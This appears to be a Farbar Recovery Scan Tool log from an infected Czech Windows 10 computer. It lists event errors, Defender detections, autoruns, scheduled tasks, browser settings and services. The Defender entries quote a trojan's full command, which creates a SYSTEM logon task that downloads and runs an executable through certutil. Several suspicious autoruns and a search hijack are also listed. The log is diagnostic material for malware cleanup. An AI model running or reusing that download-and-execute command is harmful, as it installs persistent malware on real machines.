Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 65536 (0x00010000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 32768 (0x0000000000008000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 32768 (0x00008000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 16384 (0x0000000000004000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
Error: (10/20/2020 09:15:15 PM) (Source: ESENT) (EventID: 481) (User: )
Description: taskhostw (11060,G,0) Pokus o čtení ze souboru C:\Users\42072\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat na posunu 0 (0x0000000000000000) o 16384 (0x00004000) bajtů po 0.000 sekundách selhal. Došlo k systémové chybě 5 (0x00000005): Přístup byl odepřen. . Operace čtení selže a dojde k chybě -1032 (0xfffffbf8). Pokud s tím budou dál problémy, může být soubor poškozený a budete ho možná muset obnovit z předchozí zálohy.
System errors:
=============
Error: (10/20/2020 10:10:00 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:09:19 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B6D-F52A-11D8-B9A5-505054503030}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby VSS s argumenty Není k dispozici za účelem spuštění serveru:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby VSS s argumenty Není k dispozici za účelem spuštění serveru:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby VSS s argumenty Není k dispozici za účelem spuštění serveru:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (10/20/2020 10:08:50 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (10/20/2020 10:08:35 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-4NQUTUE)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Windows Defender:
===================================
Date: 2020-10-20 21:18:45.1140000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:56:36.4060000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:53:27.5720000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:45:43.8350000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 16:42:01.0060000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\42072\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.325.1105.0, AS: 1.325.1105.0, NIS: 1.325.1105.0
Verze modulu: AM: 1.1.17500.4, NIS: 1.1.17500.4
Date: 2020-10-20 21:27:56.0780000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0750000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antispywarový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0740000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0390000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antivirový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
Date: 2020-10-20 21:27:56.0360000Z
Description:
Antivirová ochrana v programu Microsoft Defender narazil na chybu při pokusu o aktualizaci bezpečnostních informací.
Nová verze bezpečnostních informací:
Předchozí verze bezpečnostních informací: 1.325.1105.0
Zdroj aktualizace: Centrum společnosti Microsoft pro ochranu před škodlivým softwarem
Typ bezpečnostních informací: Antispywarový program
Typ aktualizace: Úplné
Uživatel: NT AUTHORITY\NETWORK SERVICE
Aktuální verze modulu:
Předchozí verze modulu: 1.1.17500.4
Kód chyby: 0x80072742
Popis chyby: Při operaci se sokety přestala pracovat síť.
==================== Memory info ===========================
BIOS: American Megatrends Inc. 0308 07/10/2007
Motherboard: ASUSTeK Computer INC. M2N-MX SE
Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4200+
Percentage of memory in use: 38%
Total physical RAM: 3071.36 MB
Available physical RAM: 1887.16 MB
Total Virtual: 6271.36 MB
Available Virtual: 5348.71 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:465.32 GB) (Free:298.64 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (KINGSTON) (Removable) (Total:14.44 GB) (Free:13.07 GB) FAT32
\\?\Volume{44cc5245-0000-0000-0000-a05474000000}\ () (Fixed) (Total:0.44 GB) (Free:0.1 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 44CC5245)
Partition 1: (Active) - (Size=465.3 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=449 MB) - (Type=27)
==========================================================
Disk: 1 (Size: 14.5 GB) (Disk ID: 0D702AAC)
Partition 1: (Not Active) - (Size=14.5 GB) - (Type=0B)
==================== End of Addition.txt =======================
Ran by 42072 (administrator) on DESKTOP-4NQUTUE (20-10-2020 22:08:19)
Running from C:\Users\42072\Desktop
Loaded Profiles: 42072
Platform: Microsoft Windows 10 Pro Version 2004 19041.450 (X86) Language: Čeština (Česko)
Default browser: Edge
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTShellHlp.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.7-0\MsMpEng.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\x86\CLIStart.exe [748744 2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
HKLM\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [5890504 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
HKLM\...\Run: [seznam-listicka-distribuce] => C:\Program Files\Seznam.cz\distribution\szninstall.exe [1069296 2018-03-27] (Seznam.cz, a.s. -> )
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [1718408 2020-04-27] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [Reflect UI] => C:\Program Files\Macrium\Common\ReflectUI.exe [6131976 2020-08-05] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
HKLM\...\Run: [DiskFixer] => C:\Program Files\DiskFixer\DiskFixer.exe [247808 2019-07-04] () [File not signed] <==== ATTENTION
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [13868168 2018-05-07] (Logitech Inc -> Logitech Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [710264 2020-06-18] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [365672 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [EpicGamesLauncher] => C:\Program Files\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe [26028432 2020-07-03] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Spotify] => C:\Users\42072\AppData\Roaming\Spotify\Spotify.exe [23220456 2020-07-05] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Mobigame Playstore] => C:\Program Files\MobiGame\playstore\playstore.exe [135680 2020-08-28] () [File not signed]
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [MuddyGlade] => C:\WINDOWS\rss\csrss.exe [4080640 2020-09-27] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [rfxgnkvq] => "C:\Users\42072\izhfpkrf.exe"
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [CloudNet] => C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe [549376 2020-10-20] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3416352 2020-10-15] (Valve -> Valve Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\86.0.4240.75\Installer\chrmstp.exe [2020-10-09] (Google LLC -> Google LLC)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0204B8D3-DE41-47BC-908C-4991B4B01C81} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {035C66D3-3267-4413-8AA1-62DEE2FE48E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [156104 2020-03-19] (Google LLC -> Google LLC)
Task: {18F6FB00-BC5E-40F2-B942-28C444FA801F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {204ECE63-4E6A-4770-A8E1-979A2508CEBF} - System32\Tasks\NvNgxUpdateCheckDaily_{2A68F03E-F03E-F03E-F03E-2A68F03EF03E} => C:\Users\42072\AppData\Roaming\fweigsc.exe <==== ATTENTION
Task: {431477B5-ED35-4340-8CAA-B6BB67524844} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [124632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {64A8F9E3-A3B3-4C83-BBEB-DBC19AC5FE37} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {6AB4A925-F182-4226-B65D-EF244AAA012C} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [600784 2020-10-13] (Mozilla Corporation -> Mozilla Foundation)
Task: {786FA461-0DED-4BF7-9479-9BAA2E1587AC} - System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0} => C:\Users\42072\AppData\Roaming\jgeigsc.exe <==== ATTENTION
Task: {847F1E03-98FC-4129-AA18-E7CDB55634DD} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {9D1BEBE2-2DD4-4A25-A32C-B86C65CCDEAA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {AD86ADA3-1803-4D49-9974-AC4B675E2828} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [4080640 2020-09-27] () [File not signed] <==== ATTENTION
Task: {C22B2574-9B3A-4D68-868F-AE2834A8D1E1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MpCmdRun.exe [460640 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(1): schtasks.exe -> /Change /TN "\MicrosoftEdgeUpdateTaskMachineCore" /ENABLE
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(2): schtasks.exe -> /Change /TN "\MicrosoftEdgeUpdateTaskMachineUA" /ENABLE
Task: {C4E5A3FD-EB6B-4D00-8FAD-EF74A2B6DC50} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(3): schtasks.exe -> /Change /TN "\AVAST Software\Gaming mode Task Scheduler recovery" /DISABLE
Task: {D5436AFF-CA8D-4256-81CB-5800BB0CDA01} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [156104 2020-03-19] (Google LLC -> Google LLC)
Task: {FFB214BF-B5AF-4129-AFD4-D5FE103A286B} - System32\Tasks\Time Trigger Task => C:\Users\42072\AppData\Local\9ed9efac-d91e-4bae-b8a6-b37bff330bfb\7DCE.exe <==== ATTENTION
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 84.16.96.225 84.16.96.2
Tcpip\..\Interfaces\{345663bd-b4f0-4a3c-9b78-46e31c76d760}: [DhcpNameServer] 84.16.96.225 84.16.96.2
Edge:
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\42072\AppData\Local\Microsoft\Edge\User Data\Default [2020-10-20]
FireFox:
========
FF DefaultProfile: 5tautenb.default
FF ProfilePath: C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\5tautenb.default [2020-09-11]
FF NewTab: Mozilla\Firefox\Profiles\5tautenb.default -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF ProfilePath: C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 [2020-10-20]
FF Homepage: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF NewTab: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF Notifications: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://mail.google.com; hxxps://uhta.getedicta.info
FF Extension: (Greasemonkey) - C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2020-10-09]
FF Plugin: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default [2020-10-20]
CHR Extension: (Prezentace) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-19]
CHR Extension: (Dokumenty) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-19]
CHR Extension: (Disk Google) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-03-19]
CHR Extension: (Seznam doplněk - Email) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgjpfhpjcgdppjbgnpnjllokbmcdllig [2020-09-12]
CHR Extension: (YouTube) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-19]
CHR Extension: (Tabulky) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-19]
CHR Extension: (d8yI+Hf7rX) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhiginakogfjlgjcgmcnahlmfllhicoe [2020-09-11]
CHR Extension: (Dokumenty Google offline) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-09-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-03-19]
CHR Extension: (Seznam doplněk - Esko) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\olfeabkoenfaoljndfecamgilllcpiak [2020-09-12]
CHR Extension: (Gmail) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-03-19]
CHR Extension: (Chrome Media Router) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-10]
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-10-10]
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\System Profile [2020-10-10]
CHR HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bgjpfhpjcgdppjbgnpnjllokbmcdllig]
CHR HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olfeabkoenfaoljndfecamgilllcpiak]
Opera:
=======
OPR Extension: (book_helper) - C:\Users\42072\AppData\Roaming\Opera Software\Opera Stable\Extensions\fhiginakogfjlgjcgmcnahlmfllhicoe [2020-09-11]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 AegLauncher; C:\Program Files\MobiGame\aeg_launcher.exe [6312448 2020-08-28] () [File not signed]
S2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [223216 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
S2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [284872 2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
